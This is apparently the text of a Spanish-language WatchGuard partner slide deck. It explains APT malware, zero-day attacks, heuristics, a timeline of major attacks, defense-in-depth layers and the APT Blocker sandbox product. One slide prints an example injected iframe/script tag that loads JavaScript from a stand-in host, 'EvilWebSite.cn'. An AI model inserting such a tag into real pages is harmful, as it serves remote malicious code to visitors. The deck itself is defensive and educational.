Apt malware

La confianza es la mejor conexión

Conozca y detecte los nuevos
ataques cibernéticos APT a los que
se expone su empresa

• Conceptos de Ataques
• Mercadeo de Amenazas
• Que es APT
• Historia del APT
• Ataques al SMB
• Estrategia de Defensa en Profundidad
• APT Blocker Watchguard
• Detección mediante análisis de tráfico
TEMARIO

Qué es una Vulnerabilidad y Exploit ?
Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar algún
método para explotarla.
Un exploit es aquel proceso o software que ataca una vulnerabilidad particular
de un sistema o aplicación.

Ataque de Dia Cero
Ventana de Vulnerabilidad

Qué es Heurística?
Encontrar una solución
por prueba y error o por
reglas basadas en la
experiencia.

Qué es Heurística Pasiva ?
Su
Analiza programas tratando
de encontrar código anómalo
antes de pasarlo a correr en
el proceso central.
Busca patrones de subrutinas,
o llamadas de programas que
indiquen comportamiento
malicioso.

Virus Chernobyl (CIH)

Inserción de Código Muerto

Reordenamiento de instrucciones

Substitución de instrucciones

Qué es Heurística Activa?
Su
El motor ejecuta el código en un
ambiente Virtual
controlado”SandBox”.Analizando
los cambios en el entorno virtual.
La Heurística Activa puede
detectar código malicioso
encriptado, codificado
compresión y código
polimorfo

Qué son las APT ?
Advanced Persistant Threat
(APT) Malware de alta tecnología
diseñado para ser sigiloso y
mantener el control de un sistema

Características Principales de un APT
21
• Amenaza dedicada a blanco especifico
• Utiliza técnicas sofisticadas
• Comunicaciones Cifradas.
• Se puede transmitir USB
• Usa Puertos 80,443,53
• Ingeniería social
• Vulnerabilidades de día cero
• Certificados fraudulentos
• Mando y Control Centralizado
• Sin ser detectados durante períodos
prolongados
• Enmascaramiento exfiltración

Las Técnicas de APT ahora atacan las
SMB
Zeus copia los ataques Stuxnet 0 day
Criminales usan 0 day malware (Cryptolocker)
Zeus usa Certificados Robados
Spear phishing
Criminales con Ataques watering hole
Ahora, los criminales del malware utilizan las
mismas tácticas avanzadas que los que
realizan ataques de estado.
Cada organizacion esta en riesgo de los APT!

Por qué atacar la SMB ?
GRAN EMPRESA $$$$
SMB $

“ MENOS DEL 1% DE LOS EMPLEADOS MANTIENEN CONDUCTAS
MALICIOSAS O TRATAN DE ATACAR LA EMPRESA. PERO EL 100% DE LOS
EMPLEADOS PUEDEN SER COMPROMETIDOS SIN DARSE CUENTA
PARA ATACAR LA EMPRESA”
¨”El Hacker puede aprovechar cualquier info de las Redes Sociales”

Principales Regiones Generadores de APT

Línea de tiempo de las Amenazas
GhostNet
Operation
Aurora
Stuxnet
RSA/Lockheed
Duqu
Flame
Gauss
NYTimes
Adobe
Target
Mar.
2009
Jan.
2010
Jun.
2010
Mar.
2011
Sep.2
011 May
2012
Dec.
2013
Jun.
2012
Jan.
2013
2009 2010 2011 2012 2013 2014
Oct.
2013
China-based
C&C
Spear Phishing
Political Targets
IE 0day
Comment Crew
(CN)
Stole Gmail and
Src
Four 0day
PLC Rootkit
Broke
Centrifuges
0day Flash Flaw
0dayTrojan
Stole SecureID
Info
0day Word flaw
Iran, Sudan,
Syrian
Cyber
Espionage
0day MS Cert
Flaw
Stole IP
Target Iranian
Oil
Targeted
Lebanon
USB LNK Flaw
APT Bank Trojan
152M records
0day
Coldfusion
Stolen source
China-based
Spear
phishing
0day
malware
40M CCNs
0day
malware
Partner
access
Nacion-Estado / Politica Criminales / Privadas

Método de Infección
Drive by Download
DBDB
Parte 1: Ataque automatizado SQL ,HTML InjectionParte 2: Drive-by Download
<iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe> OR IFRAME

Cadena Completa del APT

Herramientas Comerciales para
Hacking y Phishing

Software de Evasión Dinámica
• Revisa el entorno
• Herramientas disponibles para descarga
Derrota al sandbox y a
las máquinas virtuales

Estrategia de defensa en profundidad
tradicionales
Algunas alternativas incluyen la
mitigación del riesgo basados en
capas de seguridad y control de
Parches.
Las APT y los Ataques de Dia Cero
pueden sobrepasar las capas.
Administración de Parches
Control de vulnerabilidades Proactivo
Control de Aplicaciones y
Proxys
Control Gris
Control de dispositivos
y navegación
Control del flujo
AV/IPs
Control Conocido
Cifrado de media y disco
Control de Datos

Efectividad del AV e IPs?
Pros:
• Detiene “background noise” malware
• Puede detectar código reutilizado ( baja
probabilidad )
• Podria detener payloads despues de ser
descubiertos
Cons:
• No es una defense Proactiva ante las APT
• Evade la Euristica mediante encripció y
enmascaramiento de operaciones en
tiempo.
• La Heuristica Dinámica es de alto
desempeño y baja tasa de detecciòn.
Av/ips
Control the Known

Efectividad Device Control Y Navegacion
(Control WEB y Reputación)
Device Control y
Navegacion
Control the Flow
Pros:
• Puede evitar que los dispositivos no autorizados o las
descargas inyectan malware.
• Puede parar determinados tipos de archivos se copien
en máquinas host
• Método preventivo.
Cons:
• Siempre hay un host que esta expuesto por excepción
de políticas Ataque lateral.

Efectividad del cifrado?
Cifrado de Media y Disco Duro
Control the Data
Pros:
• Hace adquisición de datos lateral más difícil
• Una buena capa de protección de datos fuera de la
APT
Cons:
• Generalmente no protegerá los datos si el punto final
se ve comprometida a nivel de sistema

Efectividad del Control de Aplicaciones y Proxys
Control de Aplicaciones y
Proxys DPI
Control the Grey
Pros:
• Extremadamente eficaz contra los ataques de día cero
• Detiene desconocidos , cargas útiles de malware
dirigidos
• Impacto bajo rendimiento en los puntos finales
Cons:
• A medida que la flexibilidad de las política se
incrementa deja de ser efectivo.
• No detiene inyecciones en memoria ( ataques que no
escapan a la memoria de servicio)

Efectividad de Administración Parches
Administracion de Parches
Control the Vulnerability Landscape
Pros:
• Elimina la superficie atacable que los hackers pueden
dirigir
• Configuración central de cortafuegos de escritorio
nativas
• Mejora el rendimiento de punto final y la estabilidad
• Se puede activar la protección de la inyección de
memoria nativa
Cons:
• No detiene ataques de día Cero

Advanced Threats Require Defense-in-Depth
Advanced threats, by definition, leverage
multiple vectors of attack.
No single defense will protect you
completely from computer attacks…
Firewall
Intrusion Prevention System
AntiVirus
AntiSpam
Reputation Services
APT Protection
The more layers of security you have,
the higher chance an additional
protection might catch an advanced threat
that other layers might miss.

XTM Defensa en profundidad + APT Blocker
Security Eco System
39
Default Threat Protection
Proxy – Web, Email, FTP, Dns
Application Control / IPS
Webblocker / RED / SpamBlocker
AV - Malware APTBlocker

Para proteger a las empresas de las nuevas
amenazas APT, es necesario tener todas las
protecciones tradicionales y en adición tener
herramientas específicas para bloquearlas.
erability Landscape

Curva de Ataques de Dia Cero
AV/IPS OS / ApplicationSandBox
Malware And
Virus Detection

APT Blocker
Best of Breed Partner - Lastline
Fundada en 2011
Dir Redwood City, CA
8 años de investigación.
• Emulador de codigo mediante sandbox
en la Nube.
• Emulacion de Sistema incluyendo
actividad de Hardware
• Detecta malware Dia 0
• Inspecciona Millones de codigo en un
instante
• Puede detector técnicas de Evasion

Malware (R)evolution
Simple Threats
OpportunisticAttacks
APT
Solutions
Antivirus
Solutions
TargetedAttacks
Packing
Sophisticated Threats
Plain
Virus
Poly-
morphic
C&C
Fluxing
Persistent
Threats
Evasive
Threats

APT Blocker – Analisis de Malware en HD
Ejecución y emulación de código
Instrucciones de CPU Individuales
Acceso a memoria
Subrutinas de llamadas a sistema
Detección de Evasion
Provee granularidad y precisión que excede
A la competencia

Windows XP and Windows 7
• All Windows Executable Files
• MS Word
• Excel
• PowerPoint
• PDF
Android
• APK
APT Blocker

APTBlocker
Cache
Local
“Cache”
Remoto
Carga
Archivo
APT Blocker

Visibilidad con WatchGuard Dimension
47
Advanced Malware in
Security Dashboard

Reportes en WatchGuard Dimension
48

La Visibilidad Explica porqué esto es Malware
49
Drill down to find why the
activity is determined to
be malware

Security Dashboard
• Blocked Clients
• Blocked Destinations
• Blocked URL Categories
• Blocked Applications
• Blocked Protocols
• Blocked Intrusions
• Blocked Viruses

Threat Map

RECOMENDACIONES DE SEGURIDAD
• Establecer Políticas de seguridad y control de acceso.
• Establecer sitios de contingencia y backups
• Establecer un plan de desastres y recuperación
• Actualizar firmas y parches
• No dejar abiertos servicios innecesarios
• Contar con tecnología apropiada
• Realizar inspecciones de Https
• Usar diferentes capas de seguridad que cierren el vector de ataque
• Estar actualizado sobre nuevas amenazas
• Educar a los usuarios en materia de seguridad
• Poseer un plan de seguridad
• No ver los sistemas de seguridad como cajas negras
• Tener Herramientas de visibilidad y correlación de trafico en forma grafica.

Antivirus
URL
Filtering
AntiSpam
IPS
App
Control
Platform
WatchGuard Architecture
3 Year Effort
Delivered the most flexible
architecture / platform for UTM
Highest Performance
Leading UTM performance at
each price point
Management Console
“Single Pane of Glass” policy-
driven console
UTM Firmware
Spanning across all hardware
platforms
Modular Structure
To support “vendor agnostic”
strategy
Hardware:
Multiple CPU partners for best
fit to specific product line
Software:
Always Best-of-Breed software
components, with speedy
integration APT
WATCHGUARD VERDADERA DEFENSA EN
PROFUNDIDAD Y APT

 IBW WatchGuard Gold Partner y el único Partner MSSP en Centro America
 IBW posee mas de 15 años de experiencia en redes y telecomunicaciones
 Mas de 10 años de experiencia en seguridad de Redes
 Unico Integrador de soluciones de seguridad en Internet y Datos
 Cuenta con personal certificado en los diferentes producto
 Soporte remoto certificado 7/24 por medio de call center NOC
 Garantía avanzada incluyendo gastos y tramites de aduana

Gracias !!!

Apt malware

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Similar a Apt malware

Similar a Apt malware (20)

Último

Último (8)

Apt malware